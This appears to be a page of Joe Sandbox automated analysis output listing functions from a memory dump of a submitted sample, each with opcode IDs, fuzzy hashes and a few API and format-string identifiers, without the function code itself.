                                          • Instruction Fuzzy Hash: 19F02E33341D1347E776AA2D8420B3FA6D5AF90E44B05453CA642CB640DF20FC10C780
                                          Function 0132E872 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                          • Instruction ID: e0847859327e8b4da89b513346411e61f15923c44f68e090926a05c59cfec526
                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                          • Instruction Fuzzy Hash: 06F05E337116329BE321AA8EDC81F16BBA8AFD5E64F190079E6549B664C7B0EC0187D0
                                          Function 0132C89D Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f045ef5de88d594ee4f2fac51526ec70a41c21f9f113d6e2f72a383059da47c6
                                          • Instruction ID: f884a955d8d8fc2888cb74e38be8d817c9b3c214e9e53ac943e423202447007e
                                          • Opcode Fuzzy Hash: f045ef5de88d594ee4f2fac51526ec70a41c21f9f113d6e2f72a383059da47c6
                                          • Instruction Fuzzy Hash: 5BF0AF706153449FC310FF28C845A2EBBE4FF98714F80865AB898DB394E634EA00CB96
                                          Function 012D0854 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                          • Instruction ID: e04bf8f69c26e830f7c3b64c1d2136027a383bb5797c106ba4274699c755b5dc
                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                          • Instruction Fuzzy Hash: 70F0E972624205AFE715DF26CC02F96B7E9EF98350F148078A645D7170FAB0ED41C658
                                          Function 0132C912 Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 36866fa086d17c1be318d413e689b5a4474eae84400470695b04988591feeddb
                                          • Instruction ID: 09bff5fcf159ae659261c71b57b63cd3e6de3b382cca07c9116c6fd4da05360a
                                          • Opcode Fuzzy Hash: 36866fa086d17c1be318d413e689b5a4474eae84400470695b04988591feeddb
                                          • Instruction Fuzzy Hash: 88F0AF70A10249AFCB04EF69C555AAEB7F4FF18344F008055A845EB385DA34EA01CB50
                                          Function 012A47FB Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f1b263fec59f5d11260264f1d898ea3b40f6585f9e06c9c3448f54144518fefc
                                          • Instruction ID: 33510afc55c14e9ca949aaf1f86572b78f9bdaa3ad14414b037234375e8bcb38
                                          • Opcode Fuzzy Hash: f1b263fec59f5d11260264f1d898ea3b40f6585f9e06c9c3448f54144518fefc
                                          • Instruction Fuzzy Hash: 7AF024319322E28FE732EB1CE844B217BC49F00738F8C48AAC65983502C3E4E880C601
                                          Function 01360115 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3883ea57e91d4dad1a4265fa97951cbe936ea6d1733b3a93669087345699a795
                                          • Instruction ID: f7a3713f99bc4d559bcd6208d5884e3a794e7a6f0f39285ecff3c48aa238762a
                                          • Opcode Fuzzy Hash: 3883ea57e91d4dad1a4265fa97951cbe936ea6d1733b3a93669087345699a795
                                          • Instruction Fuzzy Hash: 27F055BE41B6C08ACF366B3C78977D17F6CA74162CF095089ECA16720EC5798883C320
                                          Function 012DC5ED Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 99f3dc35a3169a9a48b554a4891911c64ba5ec758306b15c5f835c5713f01fe1
                                          • Instruction ID: 40a040559055d27106a82f9ffd463ccd0dcd532d570d6e72f1e1ff39bf6bad3d
                                          • Opcode Fuzzy Hash: 99f3dc35a3169a9a48b554a4891911c64ba5ec758306b15c5f835c5713f01fe1
                                          • Instruction Fuzzy Hash: 63F052718312528FE332871CC048B21BBD49B807A0F1C942DE66687602C260F8A0CAC0
                                          Function 012E2619 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                          • Instruction ID: c2087724cffc61834a28bc7d5a2ef966c9996d25d989e20a62c401e441212fa0
                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                          • Instruction Fuzzy Hash: 9CE0D8723506016BE7129F59CCC4F677BAEDFD2B10F440479B6055F252C9E2DD0986A4
                                          Function 01336030 Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                          • Instruction ID: d4d086d99ff02aa93afa62456e96fa957fc992908e102c0047c5f4e66791a8ce
                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                          • Instruction Fuzzy Hash: D3F030B2118204AFE3218F09D986F52F7F8EB45368F45C025E6099B561D37AED40CBA8
                                          Function 012A0710 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                          • Instruction ID: 0a713fdfcd7dd22f8835f4db066cddc87e2ef3f52d88ece1254b4630f1e7cb46
                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                          • Instruction Fuzzy Hash: 7BF0E5392643469BEB1ADF19C440AA5BFE4FB51390F010098FD428B311E771E981CB95
                                          Function 012D49D0 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                          • Instruction ID: b9b289cf5515f12560bf8f8d3ec65fd75b0f315a5a2f953ab5f69e0a7fa4d9a6
                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                          • Instruction Fuzzy Hash: FCE0D8322741C6ABD3313A59C821F6677A5DBD87E0F260429E3408B954DBB0EC40C7D9
                                          Function 01374164 Relevance: .0, Instructions: 27COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6f24f9faae1f891f5b208cd7aac30d80728a2c5edd1365d10a49faccaefd7388
                                          • Instruction ID: 576ce8b2d814a49e86c0a329a3e98df1afc123a4844b89a8330ee04eaeb12f2b
                                          • Opcode Fuzzy Hash: 6f24f9faae1f891f5b208cd7aac30d80728a2c5edd1365d10a49faccaefd7388
                                          • Instruction Fuzzy Hash: 07F06D31A36AE18FE772E72CF684B5677E4AF10638F1A09A4D40687952C728FC80C650
                                          Function 0134678E Relevance: .0, Instructions: 27COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                          • Instruction ID: ee89c7d2aa90175e839751de648b385b070492c44770079647540724eaeb41d8
                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                          • Instruction Fuzzy Hash: D5E0DF72A40210BBDB22AB998D02FAABEACDB90FA4F150054B600EB094E530EE00C690
                                          Function 013708C0 Relevance: .0, Instructions: 25COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                          • Instruction ID: 3f09a81d3f1feefc0f707cba0c589627fb4e9cafe6301125b4c9434c5fadc140
                                          • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                          • Instruction Fuzzy Hash: 4BE09B32640354DBCB398A1DC140A53BFE8EF96768F15806DE90547612C235F842C6D0
                                          Function 012A25E0 Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4a34975f7a4eca1fe8523744c8fe56378d12ce726ccff60b93747a229f1e905e
                                          • Instruction ID: 079090bf5f981bda4cbed70b9deb7786f99436cd1c8f1556b814a8d8efd9cf93
                                          • Opcode Fuzzy Hash: 4a34975f7a4eca1fe8523744c8fe56378d12ce726ccff60b93747a229f1e905e
                                          • Instruction Fuzzy Hash: F8E092721105949BC721FF29DD01FAA779AEB60760F414519F11557190CA70A810C7C4
                                          Function 0135A456 Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                          • Instruction ID: c1fa152c00931484beccc4051e08150b7ae8a92b4fd4b112adb3e27ed4b5dc8e
                                          • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                          • Instruction Fuzzy Hash: 50E09231020A12DFE7726F6AD848F627EE0BF50B15F148D2CE196225B0C7B598C1DA40
                                          Function 01324000 Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                          • Instruction ID: 8987d632d29fc5f2d730ba86926f3898732ddba648fbcc6d07156d17c5da24c0
                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                          • Instruction Fuzzy Hash: BFE0C2343003158FE715DF1AC040B62BBB6BFD5A14F28C068E9488F205EB36E882CB40
                                          Function 0129823B Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                          • Instruction ID: 0fa1053db18f842c1c4583f19fcb90445563335b2784f70b8d4513a03db820e6
                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                          • Instruction Fuzzy Hash: 79E0C232870A59EFDF322F29DC04F6176E9FF55B50F24486EE186064A487F4AC81CB44
                                          Function 012A2050 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d280edd2bd3bffe59e700e996024c69ffad8bfce4cb61abe44c53158cd0267d
                                          • Instruction ID: 26bc4a51d9aded3f5d73dae3698a76b12e2ef4adc3a3feeaa61fd4e0ed59bdb6
                                          • Opcode Fuzzy Hash: 0d280edd2bd3bffe59e700e996024c69ffad8bfce4cb61abe44c53158cd0267d
                                          • Instruction Fuzzy Hash: 2BE08C32111490ABC211FA5DDD41EAA739EEBA47A0F440221F15087294CA60AC00C794
                                          Function 012DE59C Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                          • Instruction ID: 4c9bc5135d240f7114f36dc86041f864a728f52099107c4ae48cbc829fc5b349
                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                          • Instruction Fuzzy Hash: 3DD0A932214620ABD772AA1CFC00FD333E8BB88B64F060459F018C7054C360AC82CB84
                                          Function 0131E908 Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                          • Instruction ID: 457a4d6d3c3c15d356ba82fedf4c50b69092f5fd7eef4810fc58302ec7080197
                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                          • Instruction Fuzzy Hash: EEE08C319106809FCF57DF99C640F5ABBB5BB84B40F190054A4085B224C239AC00CB40
                                          Function 0129A0E3 Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                          • Instruction ID: c1eca4abb4187900dd30b0cb196b26836806aba6f15a3844f6ba4a48cbbb360d
                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                          • Instruction Fuzzy Hash: C1D0223223203193CF2896996800FA36905EB81AD0F0A002C750AA3800C0148C42C2E0
                                          Function 012DA830 Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                          • Instruction ID: ccec8a3bd9ede1ab7c9b1eedcdd7cee529f1cb4f93a379ea94a35b0ea037eaf6
                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                          • Instruction Fuzzy Hash: 10D012371E054DBBCB11DFA6DC41FA57BA9E764BA0F444020F514875A0C63AE950D684
                                          Function 012B02A0 Relevance: .0, Instructions: 13COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                          • Instruction ID: c9f875f71ed68248fffae107624d9f26cc4d0a0ccaa7cf84e05d5d708206849c
                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                          • Instruction Fuzzy Hash: 02D0C935222E81CFD61BCB1DC5A4B5633F8BB44B88F810490F601CBB62D62CD944CA04
                                          Function 012DC700 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                          • Instruction ID: eef6b296e81f9fc62e969e5cd55919f698e35ca51f834bc5677896b11a1bcb83
                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                          • Instruction Fuzzy Hash: 68C012322A0648AFC712EA99CD41F527BA9EBA8B80F000021F2048B670C631E820EA84
                                          Function 012C0310 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                          • Instruction ID: ef8508b2d6eeaf4e1a0ba675197054346fb8d765bb68ee99f3e3907e4c3d66ec
                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                          • Instruction Fuzzy Hash: 20D01236110248EFCB01DF41C890DAA772AFBD8B10F108019FD19076108A31ED63DA50
                                          Function 012A0750 Relevance: .0, Instructions: 9COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                          • Instruction ID: b1a2fc724c4b8aeed44ffdece6604b62d3a8f41e3df5b290001e94edaddc981f
                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                          • Instruction Fuzzy Hash: C6C04C757115428FCF16DF19D6D4F5577E4F744740F160890E945CB721E624E801CA10
                                          Function 012E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 9e22667f117e6fba2d81074240f3c76b2f06bc4b3eb7e06f16d8f05c073a31a6
                                          • Instruction ID: ee242c3f1ad432d0c2b3a55cb651f580d30b9c5f308c690c0513e2cc11ac3a5a
                                          • Opcode Fuzzy Hash: 9e22667f117e6fba2d81074240f3c76b2f06bc4b3eb7e06f16d8f05c073a31a6
                                          • Instruction Fuzzy Hash: E65107B6A24157FFCB15DBAC889497EFBFCBB08241B508129E59AD3641D374DE00C7A0
                                          Function 01352410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: f8fc6760348b463fab082070bb06eebfd6dcea330ccd86aba1e28e6516aa83e9
                                          • Instruction ID: c695d77d5f1140e464643f93737d1e6467b323b45bb90a1ec9ee5e0af85612ac
                                          • Opcode Fuzzy Hash: f8fc6760348b463fab082070bb06eebfd6dcea330ccd86aba1e28e6516aa83e9
                                          • Instruction Fuzzy Hash: 9B5117B1A00645EEDF74DF6CC890C7FFBF9EB44608B048869E9D6D7642D6B4EA008760
                                          Function 01376940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                          • Instruction ID: 8731ddc7e6da95ef403abd128f49ff14602b051cc4ff94ad2254e1e4ecc59fbb
                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                          • Instruction Fuzzy Hash: 370256B1508742AFE315CF19C4A4A6FBBE5EFC8708F44892DF9894B260DB35E905CB52
                                          Function 013520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$[$]:%u
                                          • API String ID: 48624451-2819853543
                                          • Opcode ID: 14c94b76cbcf1efd2cbebfcefe1040b671055cf9787ecb542bcc146328fa2a6a
                                          • Instruction ID: 7bacea98510de94b0dcc50cb99135b1088c6b9f702dd9304cfb8e9da8f25775b
                                          • Opcode Fuzzy Hash: 14c94b76cbcf1efd2cbebfcefe1040b671055cf9787ecb542bcc146328fa2a6a
                                          • Instruction Fuzzy Hash: 24215E7AA10119ABDB50DE79DC44EFFBBF9AF54A44F44012AEE05E3201E7309A018BA5
                                          Function 01352300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: fc58e02a3b8cce13921b3189860f46df7346d2bb31d26814c0530e968bc03816
                                          • Instruction ID: da3b79ca172b7486aaf8d05af2a83eebbfd8c85fa4a210bae7a1d58921d90654
                                          • Opcode Fuzzy Hash: fc58e02a3b8cce13921b3189860f46df7346d2bb31d26814c0530e968bc03816
                                          • Instruction Fuzzy Hash: EF314572A10119DFDB60DE2DDC40FAFB7F8BB54614F444559ED49E3241EB309A498BA0